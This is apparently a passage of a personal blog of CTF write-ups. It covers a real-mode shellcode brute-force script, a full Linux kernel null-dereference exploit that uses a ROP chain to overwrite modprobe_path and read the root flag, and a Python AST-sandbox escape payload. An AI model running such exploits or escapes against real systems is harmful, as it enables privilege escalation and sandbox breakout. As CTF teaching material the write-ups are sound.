 mov bx, 0x0000 ; Offset within segment (zero to read the whole flag)

 int 0x13 ; Call BIOS interrupt

 mov si, 0x0010 ; flag offset 
 mov dx,0x3f8
 mov al, byte [es:si]
 out dx,
 ; does not matter what happens after this

as you can see, this only prints one char, that’s because in the ctf i wrote my shellcode into the memory tape, which was not that long and i couldn’t fit a loop in it (i know i could have wrote it somewhere else), so what i did was output one char at a time and keep overwriting the offset in python so it would print the next char in each connection.

here is the python script:

from pwn import *

flag = ''
for off in range(0, 0x100):
 p = remote("bootflop.ctf.ingeniums.club", 1337, ssl=True)
 win = open("win.bin", "rb").read()
 win = win[:0x17] + off.to_bytes(1, 'little') + win[0x18:]


 payload = b'>'
 for i in range(len(win)):
 payload += b'>'
 payload += b'+' * win[i]

 p.sendline(payload)
 payload = b'<' * (1 + len(win))
 p.sendline(payload)

 payload = b'<' * 0x110
 payload += b'+'
 payload += b'<'
 payload += b'-' * (0xf8-0x11)
 p.sendlineafter(b'>', payload)

 a = p.recvall(timeout=1)
 flag += chr(a[-1])
 print(flag)

flag: ingehack{debugging_real_mode_apps_sucks_man} yup it definitely sucked, gdb does not even disassemble it properly.

zero chall writeup from ingehack 4.0

nothoudaifa — Wed, 26 Feb 2025 00:00:00 +0000

challenge author: itskarudo
points: 469
desc: translation services are so slow, i want a zero latency translator
for all my important business, so i made one myself, right in the
kernel.

this is a kernel exploitation challenge, we are given three files run.sh, initramfs.cpio.gz, bzImage.

looking at run.sh:

#!/bin/sh

qemu-system-x86_64 \
 -m 128M \
 -nographic \
 -kernel "./bzImage" \
 -append "console=ttyS0 quiet loglevel=3 pti=on nokaslr" \
 -monitor /dev/null \
 -initrd "./initramfs.cpio.gz" \
 -cpu qemu64,+smep \
 -smp cores=2

we can see that kaslr is not activated and only smep is on.

after extracting initramfs.cpio.gz it has:

bin chal.ko dev etc exploit home init linuxrc mnt proc root sbin sys usr var

there are two important files.

init:

#!/bin/sh

hostname zero

chown -R root:root /
chmod 0700 /root
chown -R user:user /home/user

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devpts -o gid=5,mode=0620 devpts /dev/pts
mount -t devtmpfs -o nosuid,mode=0755 udev /dev

chmod 0400 /root/flag

insmod /chal.ko
chmod 666 /dev/chal

echo 0 > /proc/sys/vm/mmap_min_addr

setsid cttyhack setuidgid 1000 /bin/sh

umount /proc && umount /sys
poweroff -d 0 -f

we can see that it loads chall.ko and runs: echo 0 > /proc/sys/vm/mmap_min_addr this command make it possible to mmap a page with a virtual address of 0x0 (this will become important later).

now looking into chall.ko using ghidra we see that it uses an ioctl interface to communicate with userland.

this ioctl handler calls functions stored in g_handler (it’s an array of functions).

in zero_open (called when you open the kernel module) we can see that it sets g_handler to lang_table.

In zero_release (called when you close the kernel module) it sets g_handler to 0x0.

The vulnerability:

g_handler is a global variable, meaning it persists when you call open,ioctl,close.

the vulnerability appears when we open two file devices then close one of them, making g_handler == 0x0, but we can still try to use it as a function pointer in zero_ioctl, which will make this a kernel null byte deference vulnerability.

to trigger it:

int fd1 = open("/dev/chal", 0x2);
int fd2 = open("/dev/chal", 0x2); // g_hanler is now equal to lang_table
close(fd1); // g_handler == 0x0
ioctl(fd1, 0x1, 0x0); // this will derefrence g_handler (which is 0x0) and jmp to that address.

Exploitation:

normally, exploiting this would be impossible because of two reasons (both of them are disabled):

mmap_min_addr: mmap_min_addr is always > 0 (it’s 0x10000 on my machine). which means that userland processes can not map a page into 0x0 address preventing the kernel null byte deference. but in this chall it’s set to 0 by echo 0 > /proc/sys/vm/mmap_min_addr .
smap: prevents the kernel from accessing userland memory.

so now if we mmap a page at 0x0 and cause the vulnerability we should be able to direct execution anywhere we want by writing the desired address at 0x0.

 char* addr = mmap(0x0, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0x0);
 // MAP_FIXED is required so it would map the page to 0x0.
 *(unsigned long*)0x0=0x41414141;

int fd1 = open("/dev/chal", 0x2);
int fd2 = open("/dev/chal", 0x2);
close(fd1);
ioctl(fd1, 0x1, 0x0);

by running this, we get:

you can see that it faulted at 0x41414141

since smap is disabled we will simply make a rop chain (kaslr is disabled, no need for leak) in userland memory and pivot to it (this surprisingly took a long time to do).

the gadget i chose is: 0xffffffff81037fbf: mov esp, 0x39e8825b; ret

i used kropr to search for this gadget, because ROPGadget gave me gadgets from non executable memory.

after this, i mmap’ed 0x39e88000 and wrote my rop chain in there.

the rop chain overwrites modprobe path to point to /home/user/pwnaa .

here is the final exploit:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
 #include <fcntl.h>
#include <sys/ioctl.h>
#include <assert.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

void sigsegv_handler(int sig) {
 puts("[*] Returned to userland, setting up for fake modprobe");

 system("echo '#!/bin/sh\ncp /root/flag /home/user/flag\nchmod 777 /home/user/flag' > /home/user/pwnaa");
 system("chmod +x /home/user/pwnaa");

 system("echo -ne '\\xff\\xff\\xff\\xff' > /home/user/dummy");
 system("chmod +x /home/user/dummy");

 puts("[*] Run unknown file");
 system("/home/user/dummy");

 puts("[*] Hopefully flag is readable");
 system("cat /home/user/flag");

 exit(0);
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

unsigned long user_rip = (unsigned long)sigsegv_handler;

void save_state(){
 __asm__(
 ".intel_syntax noprefix;"
 "mov user_cs, cs;"
 "mov user_ss, ss;"
 "mov user_sp, rsp;"
 "pushf;"
 "pop user_rflags;"
 ".att_syntax;"
 );
 puts("[*] Saved state");
}

int main (int argc, char* argv[]) {
 signal(SIGSEGV, sigsegv_handler);

 char* addr2 = mmap((void*)0x39e88000-0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0x0 );
 char* addr = mmap(0x0, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0x0);


 *(unsigned long*)0x0=0xffffffff81037fbf; //0xffffffff81037fbf: mov esp, 0x39e8825b; ret;

 int fd1 = open("/dev/chal", 0x2);
 int fd2 = open("/dev/chal", 0x2);

 assert(fd1 != -1);
 assert(fd2 != -1);

 close(fd2);

 save_state();

 unsigned long* arr = (unsigned long*)0x39e8825b;

 // gadgets:
 // 0xffffffff813089e2: mov qword ptr [rsi], rcx ; add bl, ch ; ret
 // 0xffffffff81ae90ce: pop rsi; ret
 // 0x61616e77702f7265: pop rcx; ret

 unsigned long modprobe = 0xffffffff82ed18c0 ;
 unsigned long kpti_trampoline = 0xffffffff81e0191e;
 unsigned long poprsi = 0xffffffff81ae90ce;
 unsigned long poprcx = 0xffffffff81d08613;
 unsigned long mov = 0xffffffff813089e2;
 size_t off = 0;

 arr[off++] = poprsi;
 arr[off++] = modprobe;
 arr[off++] = poprcx;
 arr[off++] = 0x73752f656d6f682f; // /home/us
 arr[off++] = mov;

 arr[off++] = poprsi;
 arr[off++] = modprobe+8;
 arr[off++] = poprcx;
 arr[off++] = 0x61616e77702f7265; // er/pwnaa
 arr[off++] = mov;

 arr[off++] = kpti_trampoline;

 arr[off++] = 0x0; // dummy rax
 arr[off++] = 0x0; // dummy rdi
 arr[off++] = user_rip;
 arr[off++] = user_cs;
 arr[off++] = user_rflags;
 arr[off++] = user_sp;
 arr[off++] = user_ss;

 ioctl(fd1, 1, 0);
}

flag: ingehack{you_can_say_you_have_ZERO_LIMITS!!_badum_tss_🥁}

astea chall writeup from uiuctf 2024

nothoudaifa — Tue, 25 Jun 2024 00:00:00 +0000

Understanding the code:

We are given this python file

import ast

def safe_import():
 print("Why do you need imports to make tea?")

def safe_call():
 print("Why do you need function calls to make tea?")

class CoolDownTea(ast.NodeTransformer):
 def visit_Call(self, node: ast.Call) -> ast.AST:
 return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])

 def visit_Import(self, node: ast.AST) -> ast.AST:
 return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

 def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:
 return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))

 def visit_Assign(self, node: ast.Assign) -> ast.AST:
 return ast.Assign(targets=node.targets, value=ast.Constant(value=0))

 def visit_BinOp(self, node: ast.BinOp) -> ast.AST:
 return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))

code = input('Nothing is quite like a cup of tea in the morning: ').splitlines()[0]

cup = ast.parse(code)
cup = CoolDownTea().visit(cup)
ast.fix_missing_locations(cup)

exec(compile(cup, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

i used chatgpt to understand most of this.

this python file takes your code and parse’s it using the ast python module.

check the docs for the ast module.

after parsing it, it runs it through CoolDownTea().visit function. the CoolDownTea class inherits from ast.NodeTransformer, what this does is go through the generated ast and change the nodes in it based on the defined functions in the CoolDownTea Class.

the CoolDownTea class does 4 things:

it turns any function call it sees into a call of the safe_call function.
it turns any import syntax (import module, from module import a) into a call to safe_import function.
it turns any assignment (specificaly ast.Assign nodes in the ast, this will be important later) into a zero assignment eg: a=2 will become a = 0.
it turns any binary operation into the binary operation on two zeros so 1+1 would become 0+0.

after that, it compiles and executes the code using exec it sets builtins to {} and sets two functions safe_call and safe_import.

Exploration:

Looking at this from afar it seems impossible to do anything since we don’t have any builtin function and even if we did we can’t call because it will be changed to safe_call call.

or is it?

in python, functions have their own builtins which basically includes all the builtin functions we know and love so we can use that.

now what? we still can’t call any functions.

remember that we are using python, if we can assign the safe_call function to a builtin function from it’s builtins we are technically calling that function by calling safe_call. something like this:

safe_call = safe_call.__builtins__['print']

the problem in here that this assignment will become (because of the NodeTransformer):

safe_call = 0

is there another way to an assignment in python.

it turns out there is. after taking a look at all the nodes in the ast module docs, it turns out there are four types of assignments:

ast.Assign: the normal assignment we know
ast.AugAssign: augmented assignment eg: x+= 2, a |= 1.
ast.AnnAssign: just the normal assignment with a type annontiation.
ast.NamedExpr: this is the walrus operator (this assignment does have some constraints).

and as it turns out, the CoolDownTea class only checks for normal assignments, which means we can use annontiated assignments to our heats content.

Cool Now we can get the flag right?

In this case we can directly edit license._Printer__filenames and make it point to flag.txt then call license functions. but obviously i didn’t do that (i didn’t know about it then).

what i thought after reaching this is that i can call any builtin function but with no arguments. so is there anything in the python builtins that can help me.

None, or at least i have not found anything

until i discovered something, when u define a function with default arguments:

def func(name='cool', age=2):
 pass

this is actually reflected in one of the function propreties, specifically defaults , it would look like this for func:

func.__defaults__ == ('cool', 2)

cool now we just gotta edit exec’s defaults with our payload and we win.

builtin functions in python does not have the defaults field.

but that’s not a problem, if there is a function that is user made and it uses it’s arguments to call any builtin function we can use that, the builtin function does not matter since we can change it using:

func.__builtins__['ord'] = func.__builtins__['exec']

safe_call and safe_import do not match we can also access the global scope using safe_call.globals but none of the functions satisfy the requirements.

until i noticed the fact the the global scope also contains the imported ast module, and it turns out all the functions in it have the defaults attribute. so i checked the source code for the ast module.

so is there any function in there?

Yes. after 2 mins of searching i found it.

the “_Unparser.interleave” function:

class _Unparser:
 def interleave(self, inter, f, seq):
 """Call f on each item in seq, calling inter() in between."""
 seq = iter(seq)
 try:
 f(next(seq))
 except StopIteration:
 pass
 else:
 for x in seq:
 inter()
 f(x)

as u can see from the description of the function it’s just perfect.

Exploit crafting:

first, we gotta edit the defaults of the interleave function, what we care about is f (function to be called), and seq (args for that function).

we set it to call exec on “print(open(’flag.txt’).read())”

safe_call.__globals__['ast']._Unparser.interleave.__defaults__: safe_call.__builtins__['tuple'] = (None, None, safe_call.__builtins__['exec'], ['print(open("flag.txt").read())']) ;

second, we assign the safe_call function to interleave function.

(safe_call:= safe_call.__globals__['ast']._Unparser.interleave)

finally, we call the safe_call function

safe_call()

our final exploit will be:

safe_call.__globals__['ast']._Unparser.interleave.__defaults__: safe_call.__builtins__['tuple'] = (None, None, safe_call.__builtins__['exec'], ['print(open("flag.txt").read())']) ; (safe_call:= safe_call.__globals__['ast']._Unparser.interleave) ; safe_call()

FLAG: uiuctf{maybe_we_shouldnt_sandbox_python_2691d6c1}